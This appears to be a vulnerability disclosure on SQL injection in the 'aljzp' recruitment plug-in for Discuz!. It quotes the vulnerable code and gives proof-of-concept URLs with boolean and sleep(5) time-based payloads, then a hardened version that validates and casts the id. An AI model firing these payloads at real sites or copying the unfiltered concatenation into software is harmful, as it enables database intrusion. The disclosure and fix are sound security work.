Discuz! SQL Injection for a plug-in (High Version accumulation, unlimited low Version)
I actually submitted this last time, but the write-up was not finished, so I am writing it up again here.
This plug-in belongs to the recruitment module of the Bright Sword (亮剑) series:
aljzp.inc.php:
```php
}else if($_GET['act'] == 'touid'){
    if(!$_G['uid']){
        showmessage(lang('plugin/aljzp','aljzp_1'), '', array(), array('login' => true));
    }
    // $_GET['gid'] is concatenated straight into the WHERE clause without any filtering;
    // the two DB::update() calls below build their where strings the same way
    if(!DB::result_first("select sign from ".DB::table('aljzp_getresume')." where id=".$_GET['gid'])){
        DB::update('aljzp_getresume',array('sign'=>1),'id='.$_GET[gid]);
        DB::update('aljzp_sentresume',array('sign'=>1),'id='.$_GET[sid]);
    }
    $regions = C::t('#aljzp#aljzp_region')->range();
    $pos = C::t('#aljzp#aljzp_position')->range();
    $lp=C::t('#aljzp#aljzp_resume')->fetch($_GET['uid']);
    include template('aljzp:touid');
}else if ($_GET['act'] == 'reflash') {
```
Look at this line:
!DB::result_first("select sign from ".DB::table('aljzp_getresume')." where id=".$_GET['gid'])
Here $_GET['gid'] goes straight into the SQL query. Now look at the URL:
http://localhost/Discuz_X3.2_SC_UTF8/upload/plugin.php?id=aljzp&act=touid&gid=1%20and%201=1
The SQL statement captured in the backend is:
There is not much to say here. I have not looked much into bypassing 3.2, but on versions before 3.2 error-based injection can be used.
Here we install version 2.5 and upgrade it to the latest version, then run just one test.
http://127.0.0.1:81/plugin.php?id=aljzp&act=touid&gid=sleep(5)
This is a 2.5 installation that lacks the patch covering the sleep function.
Latency: 5 seconds.
Solution:
Filter the input.
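As an added example (not code from the plug-in or from Discuz!), the vulnerable concatenation from aljzp.inc.php is reproduced beside a hardened version that validates and casts gid before it reaches the query string; the table prefix pre_ and the three inputs are constructed for the demonstration.

```php
<?php
// Added example: the plug-in's query construction beside a filtered version.
// Table prefix 'pre_' is assumed (DB::table() would normally supply it).

function build_query_vulnerable(array $get): string {
    // Mirrors: "select sign from ".DB::table('aljzp_getresume')." where id=".$_GET['gid']
    return "select sign from pre_aljzp_getresume where id=" . $get['gid'];
}

function build_query_safe(array $get): string {
    // Reject a missing or non-numeric id up front, then cast it; the value that
    // reaches the query is a bare integer and cannot carry SQL syntax.
    if (!isset($get['gid']) || !ctype_digit((string) $get['gid'])) {
        throw new InvalidArgumentException('gid must be a non-negative integer');
    }
    $gid = (int) $get['gid'];
    return "select sign from pre_aljzp_getresume where id=" . $gid;
}

// Constructed inputs: a benign id plus the two values used in the tests above.
$inputs = [
    ['gid' => '1'],
    ['gid' => '1 and 1=1'],
    ['gid' => 'sleep(5)'],
];

foreach ($inputs as $get) {
    echo "input: {$get['gid']}\n";
    echo "  vulnerable: " . build_query_vulnerable($get) . "\n";
    try {
        echo "  safe:       " . build_query_safe($get) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "  safe:       rejected (" . $e->getMessage() . ")\n";
    }
}
```

Run with the php CLI: the vulnerable builder emits the injected WHERE clause for the second and third inputs, while the safe builder only ever produces `where id=1` and rejects the other two.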